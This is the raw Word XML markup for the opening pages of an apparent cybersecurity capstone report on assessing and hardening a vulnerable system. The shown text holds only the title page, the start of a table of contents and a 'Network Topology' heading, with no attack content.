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2B369" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:pStyle w:val="BodyText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7159808" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3D182D08" wp14:editId="63847122">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>274319</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>274879</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="8595332" cy="459373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32" cy="459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9B99A" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53724FE4" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="636FBCE9" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50AF23BD" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69FAF57B" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BA85822" w14:textId="6AFF7CCA" w:rsidR="00377979" w:rsidRDefault="006B15D1" w:rsidP="006B15D1">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="8484"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6449F222" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03DADDC5" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E7A72C1" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="93"/>
      </w:pPr>
      <w:r>
        <w:t>Capstone Engagement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A914C0D" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:spacing w:before="226"/>
        <w:ind w:left="457" w:right="563"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="62"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="62"/>
        </w:rPr>
        <w:t>Assessment, Analysis,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731F64F6" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:ind w:left="457" w:right="575"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="62"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="62"/>
        </w:rPr>
        <w:t>and Hardening of a Vulnerable System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16713432" w14:textId="3C5D81B0" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:spacing w:before="332"/>
        <w:ind w:left="457" w:right="556"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Reported by </w:t>
      </w:r>
      <w:r w:rsidR="000A2543" w:rsidRPr="000A2543">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidR="000A2543">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">sagie </w:t>
      </w:r>
      <w:r w:rsidR="000A2543" w:rsidRPr="000A2543">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="000A2543">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>yo</w:t>
      </w:r>
      <w:r w:rsidR="000A2543" w:rsidRPr="000A2543">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> E</w:t>
      </w:r>
      <w:r w:rsidR="000A2543">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">khaguere (Leo) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">on the </w:t>
      </w:r>
      <w:r w:rsidR="000A2543">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>30</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> of </w:t>
      </w:r>
      <w:r w:rsidR="000A2543">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>November</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2021</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEC1B56" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr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space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FE17C6B" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="105"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Table of Contents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386F0E55" w14:textId="1BCE78FF" w:rsidR="00377979" w:rsidRDefault="000A2543">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial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AF50E66" wp14:editId="3CBF8E9A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>274320</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>102235</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="8595360" cy="10160"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="157" name="Lin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4C73E1" id="Line 147" o:spid="_x0000_s1026" style="position:absolute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8.05pt" to="698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" strokecolor="#595959">
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="1785974B" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:spacing w:before="142"/>
        <w:ind w:left="439"/>
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>This document contains the following sections:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B09C580" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40EAB49D" w14:textId="67091637" w:rsidR="00377979" w:rsidRDefault="000A2543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56365238" wp14:editId="7771E272">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>457200</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>187960</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="777240" cy="621665"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="15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" cy="621665"/>
                          <a:chOff x="720" y="296"/>
                          <a:chExt cx="1224" cy="979"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="155" name="Freeform 146"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="719" y="296"/>
                            <a:ext cx="1224" cy="979"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 1943 720"/>
                              <a:gd name="T1" fmla="*/ T0 w 1224"/>
                              <a:gd name="T2" fmla="+- 0 805 296"/>
                              <a:gd name="T3" fmla="*/ 805 h 979"/>
                              <a:gd name="T4" fmla="+- 0 1815 720"/>
                              <a:gd name="T5" fmla="*/ T4 w 1224"/>
                              <a:gd name="T6" fmla="+- 0 689 296"/>
                              <a:gd name="T7" fmla="*/ 689 h 979"/>
                              <a:gd name="T8" fmla="+- 0 1815 720"/>
                              <a:gd name="T9" fmla="*/ T8 w 1224"/>
                              <a:gd name="T10" fmla="+- 0 459 296"/>
                              <a:gd name="T11" fmla="*/ 459 h 979"/>
                              <a:gd name="T12" fmla="+- 0 1812 720"/>
                              <a:gd name="T13" fmla="*/ T12 w 1224"/>
                              <a:gd name="T14" fmla="+- 0 427 296"/>
                              <a:gd name="T15" fmla="*/ 427 h 979"/>
                              <a:gd name="T16" fmla="+- 0 1788 720"/>
                              <a:gd name="T17" fmla="*/ T16 w 1224"/>
                              <a:gd name="T18" fmla="+- 0 369 296"/>
                              <a:gd name="T19" fmla="*/ 369 h 979"/>
                              <a:gd name="T20" fmla="+- 0 1743 720"/>
                              <a:gd name="T21" fmla="*/ T20 w 1224"/>
                              <a:gd name="T22" fmla="+- 0 324 296"/>
                              <a:gd name="T23" fmla="*/ 324 h 979"/>
                              <a:gd name="T24" fmla="+- 0 1684 720"/>
                              <a:gd name="T25" fmla="*/ T24 w 1224"/>
                              <a:gd name="T26" fmla="+- 0 299 296"/>
                              <a:gd name="T27" fmla="*/ 299 h 979"/>
                              <a:gd name="T28" fmla="+- 0 1652 720"/>
                              <a:gd name="T29" fmla="*/ T28 w 1224"/>
                              <a:gd name="T30" fmla="+- 0 296 296"/>
                              <a:gd name="T31" fmla="*/ 296 h 979"/>
                              <a:gd name="T32" fmla="+- 0 883 720"/>
                              <a:gd name="T33" fmla="*/ T32 w 1224"/>
                              <a:gd name="T34" fmla="+- 0 296 296"/>
                              <a:gd name="T35" fmla="*/ 296 h 979"/>
                              <a:gd name="T36" fmla="+- 0 820 720"/>
                              <a:gd name="T37" fmla="*/ T36 w 1224"/>
                              <a:gd name="T38" fmla="+- 0 309 296"/>
                              <a:gd name="T39" fmla="*/ 309 h 979"/>
                              <a:gd name="T40" fmla="+- 0 768 720"/>
                              <a:gd name="T41" fmla="*/ T40 w 1224"/>
                              <a:gd name="T42" fmla="+- 0 344 296"/>
                              <a:gd name="T43" fmla="*/ 344 h 979"/>
                              <a:gd name="T44" fmla="+- 0 733 720"/>
                              <a:gd name="T45" fmla="*/ T44 w 1224"/>
                              <a:gd name="T46" fmla="+- 0 396 296"/>
                              <a:gd name="T47" fmla="*/ 396 h 979"/>
                              <a:gd name="T48" fmla="+- 0 720 720"/>
                              <a:gd name="T49" fmla="*/ T48 w 1224"/>
                              <a:gd name="T50" fmla="+- 0 459 296"/>
                              <a:gd name="T51" fmla="*/ 459 h 979"/>
                              <a:gd name="T52" fmla="+- 0 720 720"/>
                              <a:gd name="T53" fmla="*/ T52 w 1224"/>
                              <a:gd name="T54" fmla="+- 0 1112 296"/>
                              <a:gd name="T55" fmla="*/ 1112 h 979"/>
                              <a:gd name="T56" fmla="+- 0 733 720"/>
                              <a:gd name="T57" fmla="*/ T56 w 1224"/>
                              <a:gd name="T58" fmla="+- 0 1175 296"/>
                              <a:gd name="T59" fmla="*/ 1175 h 979"/>
                              <a:gd name="T60" fmla="+- 0 768 720"/>
                              <a:gd name="T61" fmla="*/ T60 w 1224"/>
                              <a:gd name="T62" fmla="+- 0 1227 296"/>
                              <a:gd name="T63" fmla="*/ 1227 h 979"/>
                              <a:gd name="T64" fmla="+- 0 820 720"/>
                              <a:gd name="T65" fmla="*/ T64 w 1224"/>
                              <a:gd name="T66" fmla="+- 0 1262 296"/>
                              <a:gd name="T67" fmla="*/ 1262 h 979"/>
                              <a:gd name="T68" fmla="+- 0 883 720"/>
                              <a:gd name="T69" fmla="*/ T68 w 1224"/>
                              <a:gd name="T70" fmla="+- 0 1275 296"/>
                              <a:gd name="T71" fmla="*/ 1275 h 979"/>
                              <a:gd name="T72" fmla="+- 0 1652 720"/>
                              <a:gd name="T73" fmla="*/ T72 w 1224"/>
                              <a:gd name="T74" fmla="+- 0 1275 296"/>
                              <a:gd name="T75" fmla="*/ 1275 h 979"/>
                              <a:gd name="T76" fmla="+- 0 1716 720"/>
                              <a:gd name="T77" fmla="*/ T76 w 1224"/>
                              <a:gd name="T78" fmla="+- 0 1262 296"/>
                              <a:gd name="T79" fmla="*/ 1262 h 979"/>
                              <a:gd name="T80" fmla="+- 0 1767 720"/>
                              <a:gd name="T81" fmla="*/ T80 w 1224"/>
                              <a:gd name="T82" fmla="+- 0 1227 296"/>
                              <a:gd name="T83" fmla="*/ 1227 h 979"/>
                              <a:gd name="T84" fmla="+- 0 1802 720"/>
                              <a:gd name="T85" fmla="*/ T84 w 1224"/>
                              <a:gd name="T86" fmla="+- 0 1175 296"/>
                              <a:gd name="T87" fmla="*/ 1175 h 979"/>
                              <a:gd name="T88" fmla="+- 0 1815 720"/>
                              <a:gd name="T89" fmla="*/ T88 w 1224"/>
                              <a:gd name="T90" fmla="+- 0 1112 296"/>
                              <a:gd name="T91" fmla="*/ 1112 h 979"/>
                              <a:gd name="T92" fmla="+- 0 1815 720"/>
                              <a:gd name="T93" fmla="*/ T92 w 1224"/>
                              <a:gd name="T94" fmla="+- 0 921 296"/>
                              <a:gd name="T95" fmla="*/ 921 h 979"/>
                              <a:gd name="T96" fmla="+- 0 1943 720"/>
                              <a:gd name="T97" fmla="*/ T96 w 1224"/>
                              <a:gd name="T98" fmla="+- 0 805 296"/>
                              <a:gd name="T99" fmla="*/ 805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24" h="979">
                                <a:moveTo>
                                  <a:pt x="1223" y="509"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1095" y="393"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1095" y="163"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1092" y="131"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1068" y="73"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1023" y="28"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="964" y="3"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="932" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="163" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="100" y="13"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="48" y="48"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="13" y="100"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="163"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="816"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="13" y="879"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="48" y="931"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="100" y="966"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="163" y="979"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="932" y="979"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="996" y="966"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1047" y="931"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1082" y="879"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1095" y="816"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1095" y="625"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1223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B6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296"/>
                            <a:ext cx="1224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BF50F" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                              <w:pPr>
                                <w:spacing w:before="76"/>
                                <w:ind w:left="219"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Roboto"/>
                                  <w:sz w:val="60"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Roboto"/>
                                  <w:sz w:val="60"/>
                                </w:rPr>
                                <w:t>01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365238" id="Group 144" o:spid="_x0000_s1026" style="position:absolute;margin-left:36pt;margin-top:14.8pt;width:61.2pt;height:48.95pt;z-index:-15727104;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordorigin="720,296" coordsize="1224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">
                <v:shape id="Freeform 146" o:spid="_x0000_s1027" style="position:absolute;left:719;top:296;width:1224;height:979;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1224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" path="m1223,509l1095,393r,-230l1092,131,1068,73,1023,28,964,3,932,,163,,100,13,48,48,13,100,,163,,816r13,63l48,931r52,35l163,979r769,l996,966r51,-35l1082,879r13,-63l1095,625,1223,509xe" fillcolor="#a8b6bf" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1223,805;1095,689;1095,459;1092,427;1068,369;1023,324;964,299;932,296;163,296;100,309;48,344;13,396;0,459;0,1112;13,1175;48,1227;100,1262;163,1275;932,1275;996,1262;1047,1227;1082,1175;1095,1112;1095,921;1223,805" o:connectangles="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5" o:spid="_x0000_s1028" type="#_x0000_t202" style="position:absolute;left:720;top:296;width:1224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4FFBF50F" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                        <w:pPr>
                          <w:spacing w:before="76"/>
                          <w:ind w:left="219"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Roboto"/>
                            <w:sz w:val="60"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Roboto"/>
                            <w:sz w:val="60"/>
                          </w:rPr>
                          <w:t>01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7CFD0F39" wp14:editId="12C583B9">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1352550</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>187960</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7517130" cy="621665"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="15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17130" cy="621665"/>
                          <a:chOff x="2130" y="296"/>
                          <a:chExt cx="11838" cy="979"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="152" name="Freeform 143"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="2130" y="296"/>
                            <a:ext cx="11838" cy="979"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 13805 2130"/>
                              <a:gd name="T1" fmla="*/ T0 w 11838"/>
                              <a:gd name="T2" fmla="+- 0 1275 296"/>
                              <a:gd name="T3" fmla="*/ 1275 h 979"/>
                              <a:gd name="T4" fmla="+- 0 2293 2130"/>
                              <a:gd name="T5" fmla="*/ T4 w 11838"/>
                              <a:gd name="T6" fmla="+- 0 1275 296"/>
                              <a:gd name="T7" fmla="*/ 1275 h 979"/>
                              <a:gd name="T8" fmla="+- 0 2230 2130"/>
                              <a:gd name="T9" fmla="*/ T8 w 11838"/>
                              <a:gd name="T10" fmla="+- 0 1262 296"/>
                              <a:gd name="T11" fmla="*/ 1262 h 979"/>
                              <a:gd name="T12" fmla="+- 0 2178 2130"/>
                              <a:gd name="T13" fmla="*/ T12 w 11838"/>
                              <a:gd name="T14" fmla="+- 0 1227 296"/>
                              <a:gd name="T15" fmla="*/ 1227 h 979"/>
                              <a:gd name="T16" fmla="+- 0 2143 2130"/>
                              <a:gd name="T17" fmla="*/ T16 w 11838"/>
                              <a:gd name="T18" fmla="+- 0 1175 296"/>
                              <a:gd name="T19" fmla="*/ 1175 h 979"/>
                              <a:gd name="T20" fmla="+- 0 2130 2130"/>
                              <a:gd name="T21" fmla="*/ T20 w 11838"/>
                              <a:gd name="T22" fmla="+- 0 1112 296"/>
                              <a:gd name="T23" fmla="*/ 1112 h 979"/>
                              <a:gd name="T24" fmla="+- 0 2130 2130"/>
                              <a:gd name="T25" fmla="*/ T24 w 11838"/>
                              <a:gd name="T26" fmla="+- 0 459 296"/>
                              <a:gd name="T27" fmla="*/ 459 h 979"/>
                              <a:gd name="T28" fmla="+- 0 2143 2130"/>
                              <a:gd name="T29" fmla="*/ T28 w 11838"/>
                              <a:gd name="T30" fmla="+- 0 396 296"/>
                              <a:gd name="T31" fmla="*/ 396 h 979"/>
                              <a:gd name="T32" fmla="+- 0 2178 2130"/>
                              <a:gd name="T33" fmla="*/ T32 w 11838"/>
                              <a:gd name="T34" fmla="+- 0 344 296"/>
                              <a:gd name="T35" fmla="*/ 344 h 979"/>
                              <a:gd name="T36" fmla="+- 0 2230 2130"/>
                              <a:gd name="T37" fmla="*/ T36 w 11838"/>
                              <a:gd name="T38" fmla="+- 0 309 296"/>
                              <a:gd name="T39" fmla="*/ 309 h 979"/>
                              <a:gd name="T40" fmla="+- 0 2293 2130"/>
                              <a:gd name="T41" fmla="*/ T40 w 11838"/>
                              <a:gd name="T42" fmla="+- 0 296 296"/>
                              <a:gd name="T43" fmla="*/ 296 h 979"/>
                              <a:gd name="T44" fmla="+- 0 13805 2130"/>
                              <a:gd name="T45" fmla="*/ T44 w 11838"/>
                              <a:gd name="T46" fmla="+- 0 296 296"/>
                              <a:gd name="T47" fmla="*/ 296 h 979"/>
                              <a:gd name="T48" fmla="+- 0 13867 2130"/>
                              <a:gd name="T49" fmla="*/ T48 w 11838"/>
                              <a:gd name="T50" fmla="+- 0 309 296"/>
                              <a:gd name="T51" fmla="*/ 309 h 979"/>
                              <a:gd name="T52" fmla="+- 0 13920 2130"/>
                              <a:gd name="T53" fmla="*/ T52 w 11838"/>
                              <a:gd name="T54" fmla="+- 0 344 296"/>
                              <a:gd name="T55" fmla="*/ 344 h 979"/>
                              <a:gd name="T56" fmla="+- 0 13956 2130"/>
                              <a:gd name="T57" fmla="*/ T56 w 11838"/>
                              <a:gd name="T58" fmla="+- 0 397 296"/>
                              <a:gd name="T59" fmla="*/ 397 h 979"/>
                              <a:gd name="T60" fmla="+- 0 13968 2130"/>
                              <a:gd name="T61" fmla="*/ T60 w 11838"/>
                              <a:gd name="T62" fmla="+- 0 459 296"/>
                              <a:gd name="T63" fmla="*/ 459 h 979"/>
                              <a:gd name="T64" fmla="+- 0 13968 2130"/>
                              <a:gd name="T65" fmla="*/ T64 w 11838"/>
                              <a:gd name="T66" fmla="+- 0 1112 296"/>
                              <a:gd name="T67" fmla="*/ 1112 h 979"/>
                              <a:gd name="T68" fmla="+- 0 13955 2130"/>
                              <a:gd name="T69" fmla="*/ T68 w 11838"/>
                              <a:gd name="T70" fmla="+- 0 1175 296"/>
                              <a:gd name="T71" fmla="*/ 1175 h 979"/>
                              <a:gd name="T72" fmla="+- 0 13920 2130"/>
                              <a:gd name="T73" fmla="*/ T72 w 11838"/>
                              <a:gd name="T74" fmla="+- 0 1227 296"/>
                              <a:gd name="T75" fmla="*/ 1227 h 979"/>
                              <a:gd name="T76" fmla="+- 0 13868 2130"/>
                              <a:gd name="T77" fmla="*/ T76 w 11838"/>
                              <a:gd name="T78" fmla="+- 0 1262 296"/>
                              <a:gd name="T79" fmla="*/ 1262 h 979"/>
                              <a:gd name="T80" fmla="+- 0 13805 2130"/>
                              <a:gd name="T81" fmla="*/ T80 w 11838"/>
                              <a:gd name="T82" fmla="+- 0 1275 296"/>
                              <a:gd name="T83" fmla="*/ 1275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838" h="979">
                                <a:moveTo>
                                  <a:pt x="11675" y="979"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="163" y="979"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="100" y="966"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="48" y="931"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="13" y="879"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="816"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="163"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="13" y="100"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="48" y="48"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="100" y="13"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="163" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="11675" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="11737" y="13"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="11790" y="48"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="11826" y="101"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="11838" y="163"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="11838" y="816"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="11825" y="879"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="11790" y="931"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="11738" y="966"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="11675" y="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2130" y="296"/>
                            <a:ext cx="11838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BB099" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                              <w:pPr>
                                <w:spacing w:before="230"/>
                                <w:ind w:left="295"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Roboto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36"/>
                                </w:rPr>
                                <w:t>Network Topology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FD0F39" id="Group 141" o:spid="_x0000_s1029" style="position:absolute;margin-left:106.5pt;margin-top:14.8pt;width:591.9pt;height:48.95pt;z-index:-15726080;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordorigin="2130,296" coordsize="11838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">
                <v:shape id="Freeform 143" o:spid="_x0000_s1030" style="position:absolute;left:2130;top:296;width:11838;height:979;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="11838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" path="m11675,979l163,979,100,966,48,931,13,879,,816,,163,13,100,48,48,100,13,163,,11675,r62,13l11790,48r36,53l11838,163r,653l11825,879r-35,52l11738,966r-63,13xe" fillcolor="#f2f2f2" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="11675,1275;163,1275;100,1262;48,1227;13,1175;0,1112;0,459;13,396;48,344;100,309;163,296;11675,296;11737,309;11790,344;11826,397;11838,459;11838,1112;11825,1175;11790,1227;11738,1262;11675,1275" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 142" o:spid="_x0000_s1031" type="#_x0000_t202" style="position:absolute;left:2130;top:296;width:11838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49DBB099" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
                        <w:pPr>
                          <w:spacing w:before="230"/>
                          <w:ind w:left="295"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Roboto"/>
                            <w:b/>
                            <w:sz w:val="36"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Roboto"/>
                            <w:b/>
                            <w:sz w:val="36"/>
                          </w:rPr>
                          <w:t>Network Topology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33DF898" wp14:editId="64EA59A4">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>457200</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
